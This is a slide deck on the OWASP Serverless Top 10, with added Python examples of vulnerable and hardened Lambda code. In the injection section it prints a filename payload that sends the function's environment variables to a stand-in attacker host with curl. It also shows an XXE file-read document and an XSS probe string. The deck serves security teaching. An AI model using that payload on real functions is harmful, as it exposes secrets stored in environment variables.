INTRODUCTION TO OWASP Serverless Top 10
About me
Chandrapal Badshah
Security Enthusiast
Build, Break, Build guy
Would love to talk about plants ;)
Contact:
● twitter.com/@bnchandrapal
● github.com/Chan9390
START WITH WHY
- Simon Sinek
Once upon a time... a single server diagram: Database, Web Server, CPU, Memory, Web Application, Static Files.
But ... Security: maintaining/updating the operating system with security patches, WAF/firewall configuration, network monitoring, etc.
CHANGED THE GAME
Introduction to Microservices
Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
Introduction to Serverless
The phrase “serverless” doesn’t mean servers are no longer involved. It simply
means that developers no longer have to think that much about them.
Computing resources get used as services without having to manage around
physical capabilities or limits.
https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
https://martinfowler.com/bliki/Serverless.html
Cloud Providers
Serverless Tools & Frameworks
Who uses Serverless (AWS Lambda)
https://aws.amazon.com/lambda/resources/customer-case-studies/
Features of Function-as-a-Service
➔ Stateless functions
➔ Complete abstraction
➔ Instant, Scalable and event-driven
➔ Pay for what you use
➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every
month)
➔ There is a default timeout
➔ The function guidelines are defined by the Cloud Service Provider
➔ Multiple Languages supported
DEMO - Deploying Serverless App
So simple, right?
What if … ?
One question?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10?
● The way the apps are created is similar to that of server based applications
● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
Let’s jump into OWASP Serverless Top 10
A1: Injection
● Serverless functions don’t only support HTTP triggers; they also support cloud storage events, database changes, etc
● SQL/NoSQL injection
● OS Command Injection
● Code Injection - the severity depends on the permissions given to the
vulnerable lambda function
An example scenario: CV filtering system
User sends mail with CV attached → Email reaches the server → AWS SNS sends notification to Lambda → Lambda gets the mail, parses it if there’s a PDF attachment
Can you see the bug? The function:
● Checks if the file has a file name
● Checks if the filename ends with .pdf
● Appends the filename with /tmp
● Executes a command: pdftotext
Payload (to print the environment variables):
foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
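The CV-parsing flow above, written out in Python as an added example (this is not the deck's Lambda code, whose language the slides do not show). It assumes the attachment has already been saved under /tmp and that pdftotext is on PATH; the names vulnerable_command, safe_command, extract_text and accepts are the example's own. The first function reproduces the slide's logic and shows why a ".pdf" suffix check is no defence once the string reaches a shell; the second rejects any name outside a conservative character set and passes an argv list, so no shell is involved at all.

```python
import os
import re
import subprocess

# Added illustration of the CV-parsing Lambda on the slides; not the deck's code.
# Assumptions: attachments are already written to WORK_DIR, pdftotext is on PATH.
WORK_DIR = "/tmp"
_SAFE_STEM = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


def vulnerable_command(filename):
    """The flow from the slide: has a name? ends with .pdf? prepend /tmp, run.
    Anything ending in '.pdf' passes, including a name carrying ';', '|' or '#',
    and the resulting string is meant for shell=True, so the shell acts on them."""
    if not filename:
        raise ValueError("attachment has no filename")
    if not filename.endswith(".pdf"):
        raise ValueError("not a PDF attachment")
    path = WORK_DIR + "/" + filename
    return "pdftotext " + path + " " + path[:-4] + ".txt"


def safe_command(filename):
    """Hardened form: strip directories, allow a conservative character set,
    and build an argv list so no shell ever sees the attachment name."""
    if not filename:
        raise ValueError("attachment has no filename")
    stem, ext = os.path.splitext(os.path.basename(filename))
    if ext.lower() != ".pdf" or not _SAFE_STEM.fullmatch(stem):
        raise ValueError("rejected attachment name: %r" % filename)
    src = os.path.join(WORK_DIR, stem + ".pdf")
    dst = os.path.join(WORK_DIR, stem + ".txt")
    return ["pdftotext", src, dst]


def accepts(filename):
    """True if the hardened validator would let this attachment name through."""
    try:
        safe_command(filename)
        return True
    except ValueError:
        return False


def extract_text(filename):
    """Run the hardened command without a shell and return the extracted text."""
    argv = safe_command(filename)
    subprocess.run(argv, check=True, timeout=30)
    with open(argv[2], encoding="utf-8", errors="replace") as fh:
        return fh.read()
```

The argv list is the important part: with subprocess.run(argv) the attachment name can only ever be one argument to pdftotext, whatever characters it contains, whereas the string built by vulnerable_command is only safe if every caller remembers never to hand it to a shell.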
A2: Broken Authentication
● Functions are Stateless
● Multiple entry points, services, events and triggers and no continuous flow -
things can get worse
● Common example: the functions for internal use only are available to all
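Because every function is its own entry point with no continuous flow, an "internal only" function has to authenticate each invocation itself. The following is an added example, not code from the deck: the calling function signs the event with a shared secret and a timestamp, and the internal function refuses anything unsigned, tampered or stale. The secret value, the field names ts/body/sig and the five-minute skew window are the example's own choices; in a real deployment the secret would come from a secrets manager and IAM invocation permissions would be the first layer.

```python
import hashlib
import hmac
import json
import time

# Constructed shared secret; a real function would fetch this from a secrets store.
SECRET = b"constructed-shared-secret"
MAX_SKEW_SECONDS = 300


def sign_internal_event(payload, secret, ts=None):
    """Producer side: canonical JSON body + timestamp, HMAC-SHA256 over both."""
    ts = int(time.time()) if ts is None else int(ts)
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    mac = hmac.new(secret, ("%d.%s" % (ts, body)).encode("utf-8"), hashlib.sha256)
    return {"ts": ts, "body": body, "sig": mac.hexdigest()}


def verify_internal_event(event, secret, now=None):
    """Consumer side: reject missing fields, stale timestamps and bad MACs
    before touching the payload. Returns the decoded payload on success."""
    now = int(time.time()) if now is None else int(now)
    try:
        ts = int(event["ts"])
        body = event["body"]
        sig = event["sig"]
    except (KeyError, TypeError, ValueError):
        raise PermissionError("missing or malformed authentication fields")
    if abs(now - ts) > MAX_SKEW_SECONDS:
        raise PermissionError("timestamp outside the allowed window")
    expected = hmac.new(secret, ("%d.%s" % (ts, body)).encode("utf-8"), hashlib.sha256)
    # constant-time comparison so the MAC cannot be guessed byte by byte
    if not hmac.compare_digest(expected.hexdigest(), str(sig)):
        raise PermissionError("signature mismatch")
    return json.loads(body)


def is_authentic(event, secret, now=None):
    """Boolean wrapper around verify_internal_event."""
    try:
        verify_internal_event(event, secret, now)
        return True
    except PermissionError:
        return False


def handler(event, context=None):
    """Internal-only Lambda: authenticate first, then do the work."""
    payload = verify_internal_event(event, SECRET)
    return {"statusCode": 200, "body": json.dumps({"processed": payload.get("job")})}
```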
A3: Sensitive Data Exposure
● Depends on the architecture just like other server based applications
● Common example: having functions disclosing logs in some specific endpoint
A bug I recently found
A4: XML External Entity
● Insecure way of parsing XML files by the serverless function
● The exploitability may not always be fruitful
Vulnerable code … (downloads the XML file from a bucket and parses it)
The Payload ...
The result…
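The XXE slides show code, payload and result as images; here is an added, runnable Python equivalent of the same weakness (not the deck's code). It assumes the function parses with xml.sax, stands in for the S3 download with constructed bytes, and uses a temporary file as the "secret" an external entity would pull in. The only difference between the two parses is the external-general-entities feature: left on, the entity body is resolved and lands in the element text; turned off, the same document yields nothing.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers the character data of the document, which is where an
    expanded external entity would surface."""

    def __init__(self):
        super().__init__()
        self._parts = []

    def characters(self, content):
        self._parts.append(content)

    def text(self):
        return "".join(self._parts).strip()


def parse_document(data, resolve_external_entities):
    """Parse XML bytes; the flag is the vulnerable/hardened switch."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return collector.text()


def demo():
    """Constructed scenario: a local file plays the role of data the function
    should never expose, and the 'downloaded' XML references it via an entity."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as fh:
            fh.write("constructed-secret-value")
        xml_doc = (
            '<?xml version="1.0"?>'
            '<!DOCTYPE data [<!ENTITY xxe SYSTEM "' + secret_path + '">]>'
            "<data>&xxe;</data>"
        ).encode("utf-8")
        return {
            "vulnerable": parse_document(xml_doc, resolve_external_entities=True),
            "hardened": parse_document(xml_doc, resolve_external_entities=False),
        }
```

Recent Python versions already default feature_external_ges to off for xml.sax; the vulnerable branch has to opt in, which is exactly the kind of "convenience" setting worth searching for in a code review of any parser the function uses.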
A5: Broken Access Control
● Functions with excessive privileges
● If a function is allowed to access anything on the cloud account, so is an attacker who exploits a vulnerability in it, such as code execution
A6: Security Misconfiguration
● Not just the function but how the function interacts with the environment
● Because of the complexity introduced by the growing number of features and functions, it’s very easy to end up with security misconfigurations
● Can lead to DoS/timeouts
● Example: Public S3 buckets
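A5 and A6 both come down to policy documents: the function's execution role (A5) and the bucket policy of the storage it reads (A6). The following added example (not from the deck) is a small Python checker that a CI step could run over both kinds of policy before deployment. The policies are constructed, the account id 123456789012 and the bucket and role names are placeholders, and the checks are deliberately simple heuristics: a bare "*" action or resource in an Allow statement, and an Allow statement for an anonymous principal with no Condition.

```python
import json


def _as_list(value):
    """IAM JSON lets most fields be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def allow_statements(policy):
    return [s for s in _as_list(policy.get("Statement", [])) if s.get("Effect") == "Allow"]


def overprivileged_findings(policy):
    """A5: Allow statements whose Action or Resource is a wildcard."""
    findings = []
    for st in allow_statements(policy):
        actions = _as_list(st.get("Action", []))
        resources = _as_list(st.get("Resource", []))
        wild_actions = [a for a in actions if a == "*" or a.endswith(":*")]
        if wild_actions:
            findings.append("wildcard action(s): " + ", ".join(wild_actions))
        if "*" in resources:
            findings.append("wildcard resource for: " + ", ".join(actions))
    return findings


def is_public_bucket_policy(policy):
    """A6: an unconditional Allow for anonymous principals makes the bucket public."""
    for st in allow_statements(policy):
        principal = st.get("Principal")
        anonymous = principal == "*" or (
            isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))
        )
        if anonymous and not st.get("Condition"):
            return True
    return False


# Constructed policies (placeholders, not real resources).
LOOSE_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}
SCOPED_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::constructed-cv-uploads/*"},
        {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/constructed-cv-parser:*"},
    ],
}
PUBLIC_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::constructed-cv-uploads/*"}],
}
PRIVATE_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Principal": {"AWS": "arn:aws:iam::123456789012:role/constructed-cv-parser-role"},
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::constructed-cv-uploads/*"}],
}


def review(role_policy, bucket_policy):
    """Combine both checks into one report, as a pre-deploy gate would."""
    return json.dumps({
        "role_findings": overprivileged_findings(role_policy),
        "bucket_public": is_public_bucket_policy(bucket_policy),
    })
```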
A7: Cross Site Scripting (XSS)
● The most common bug; it affects serverless functions as well
● Mostly due to lack of user input sanitization
Find the bug… (scenario)
User sends mail → Email reaches the server → AWS SNS sends notification to Lambda → Lambda gets the mail, parses it and sends the message content to the moderator dashboard
Find the bug… The function:
● Gets the message content
● Sends the message content to the dashboard
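The moderator-dashboard scenario as an added Python example (not the deck's code). The SNS event shape is constructed: Records[0].Sns.Message is assumed to be a JSON string carrying the mail body in a "content" field. The vulnerable renderer interpolates the body straight into HTML, as the slide's function does; the hardened one escapes every untrusted string and sends a Content-Security-Policy header as a second layer.

```python
import html
import json


def extract_message(sns_event):
    """Pull the mail body out of the SNS notification (constructed shape)."""
    message = json.loads(sns_event["Records"][0]["Sns"]["Message"])
    return message["content"]


def render_dashboard_vulnerable(messages):
    """Mail bodies dropped into markup unchanged: any tag in a mail runs in the
    moderator's browser."""
    return "<ul>" + "".join("<li>%s</li>" % m for m in messages) + "</ul>"


def render_dashboard_safe(messages):
    """Escape <, >, &, quotes before the text is placed in HTML element content."""
    return "<ul>" + "".join("<li>%s</li>" % html.escape(m, quote=True) for m in messages) + "</ul>"


def dashboard_response(messages):
    """Lambda-proxy style response with escaped body and a restrictive CSP."""
    return {
        "statusCode": 200,
        "headers": {
            "Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": "default-src 'self'",
        },
        "body": render_dashboard_safe(messages),
    }


# Constructed SNS event containing a hostile mail body (the classic probe string).
CONSTRUCTED_EVENT = {
    "Records": [{"Sns": {"Message": json.dumps({"content": "<script>alert(1)</script>"})}}]
}
```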
A8: Insecure Deserialization
● Common in Python and NodeJS, but also affects Java and dotNET
● Mostly introduced due to insecure use of 3rd party libraries
Example Java payload
The payload in request…
And the result…
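The deck's deserialization payload is Java and shown as an image; as an added example in Python, which the slide names as equally affected, here is the defensive side: a restricted unpickler that only allows a fixed set of builtin container types, plus an opcode scan that flags any pickle referencing a global before it is loaded. This is not the deck's code. The hostile sample is constructed from a pickled reference to a library function; loading it under the restriction raises instead of importing it.

```python
import builtins
import io
import os
import pickle
import pickletools

# Types a plain data payload legitimately needs; nothing that imports code.
SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "bytes",
                 "int", "float", "bool", "complex"}

# Opcodes that pull in a class/function by name or call one.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE"}


class RestrictedUnpickler(pickle.Unpickler):
    """Documented Python pattern: override find_class to allow-list globals."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("refusing to load global %s.%s" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def references_globals(data):
    """Static pre-check: does the stream contain any code-loading opcode?"""
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in RISKY_OPCODES:
            return True
    return False


def loads_rejected(data):
    """True if the restricted loader refuses the stream."""
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


# Constructed samples: a benign data payload and a stream that merely
# references os.system by name (loading it would import, not execute).
BENIGN_PICKLE = pickle.dumps({"user": "alice", "tags": [1, 2], "roles": {"viewer"}})
HOSTILE_PICKLE = pickle.dumps(os.system)
```

The allow-list is the real control; the opcode scan is cheap triage that lets a function log and drop a suspicious payload before any unpickling starts. Where the data format is under your control, replacing pickle with JSON and a schema removes the problem altogether.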
A9: Using components with known vulnerabilities
● Using dependencies which are insecure
● The most commonly found issue
● Not every vulnerability will affect serverless functions
● Doesn’t always lead to remote exploitation
A10: Insufficient Logging and Monitoring
● Auditing serverless functions is even more difficult than traditional web applications
● Since the client interacts directly with the serverless functions, there is no place to put a WAF or any active monitoring system in front of them
● This actually helps attackers
Lambda code
Lambda logs
Lambda Logs (in case of huge payload)
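With no WAF in the path, the function's own log line is often the only record of an invocation, and the "huge payload" slide shows how a large input makes that record useless. The following added example (not the deck's code) shows one way to log from a Lambda handler so that every invocation produces one structured, bounded line: the trigger type, the request id, the outcome, the payload size, a SHA-256 of the whole payload for correlation, and a short preview. The 512-byte preview limit and the event shapes used for source detection are the example's own assumptions.

```python
import hashlib
import json
import time

MAX_PREVIEW_BYTES = 512   # keep every log line bounded, whatever arrives


def detect_source(event):
    """Classify the trigger so an analyst can separate SNS, S3 and HTTP invocations."""
    records = event.get("Records") or []
    if records:
        first = records[0]
        if "Sns" in first:
            return "sns"
        if "s3" in first:
            return "s3"
        return first.get("eventSource", "unknown")
    if "httpMethod" in event or "requestContext" in event:
        return "api-gateway"
    return "unknown"


def build_log_record(event, request_id, outcome, now=None):
    """One JSON-serialisable record per invocation. The full payload is hashed,
    not logged, so a huge input cannot flood the log stream while the complete
    input remains correlatable with a stored copy."""
    raw = json.dumps(event, sort_keys=True, separators=(",", ":")).encode("utf-8")
    preview = raw[:MAX_PREVIEW_BYTES].decode("utf-8", errors="replace")
    return {
        "ts": time.time() if now is None else now,
        "request_id": request_id,
        "source": detect_source(event),
        "outcome": outcome,
        "payload_bytes": len(raw),
        "payload_sha256": hashlib.sha256(raw).hexdigest(),
        "payload_preview": preview,
        "truncated": len(raw) > MAX_PREVIEW_BYTES,
    }


def handler(event, context=None):
    """Lambda entry point: emits exactly one structured line even on failure."""
    request_id = getattr(context, "aws_request_id", "constructed-request-id")
    outcome = "error"
    try:
        # real work would go here
        outcome = "ok"
        return {"statusCode": 200}
    finally:
        print(json.dumps(build_log_record(event, request_id, outcome)))


# Constructed oversized event, standing in for the 'huge payload' slide.
BIG_EVENT = {"httpMethod": "POST", "body": "A" * 5000}
```

Printing JSON is enough on Lambda because stdout goes to CloudWatch Logs, where a metric filter on "outcome":"error" or on "truncated":true can raise an alarm; the hash lets an investigator tie the line to the original payload if the function also archives inputs elsewhere.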
Resources
OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project
OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project
Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g
Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0
AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops
PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
Stay tuned!
Damn Vulnerable Serverless App on its way
Any Questions?

More Related Content

What's hot

Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your CloudTeri Radichel
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod securityRomansh Yadav
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Madhu Akula
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containersAqua Security
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security StrategyTeri Radichel
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in AzureCheah Eng Soon
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Paula Januszkiewicz
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMOlesya Shelestova
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for DevelopersMichael Boelen
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...webhostingguy
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackerstomasperezv
 

What's hot (20)

Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your Cloud
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs Security
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
 
Mod Security
Mod SecurityMod Security
Mod Security
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containers
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security Strategy
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEM
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackers
 

Similar to OWASP Serverless Top 10

Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_iigoogli
 
Web Security Programming I I
Web  Security  Programming  I IWeb  Security  Programming  I I
Web Security Programming I IPavu Jas
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_iigoogli
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityAvi Shulman
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Docebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessDocebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessAWS User Group Italy
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesAmazon Web Services
 
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Fwdays
 
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Akash Mahajan
 
Serverless meetup Auckland #6
Serverless meetup Auckland #6Serverless meetup Auckland #6
Serverless meetup Auckland #6Myles Henaghan
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Ishan Girdhar
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Emerson Eduardo Rodrigues Von Staffen
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...Amazon Web Services
 
Building Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudBuilding Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudSrini Karlekar
 

Similar to OWASP Serverless Top 10 (20)

demo1
demo1demo1
demo1
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
 
Web Security Programming I I
Web  Security  Programming  I IWeb  Security  Programming  I I
Web Security Programming I I
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Docebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessDocebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverless
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best Pratices
 
Going Serverless on AWS
Going Serverless on AWSGoing Serverless on AWS
Going Serverless on AWS
 
Cloud Computing basic
Cloud Computing basicCloud Computing basic
Cloud Computing basic
 
Operations: Security
Operations: SecurityOperations: Security
Operations: Security
 
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
 
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
 
Serverless meetup Auckland #6
Serverless meetup Auckland #6Serverless meetup Auckland #6
Serverless meetup Auckland #6
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
 
Building Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudBuilding Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the Cloud
 

More from Chandrapal Badshah

Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
 
Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Chandrapal Badshah
 
How to get started in InfoSec ?
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?Chandrapal Badshah
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionChandrapal Badshah
 
OSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationChandrapal Badshah
 
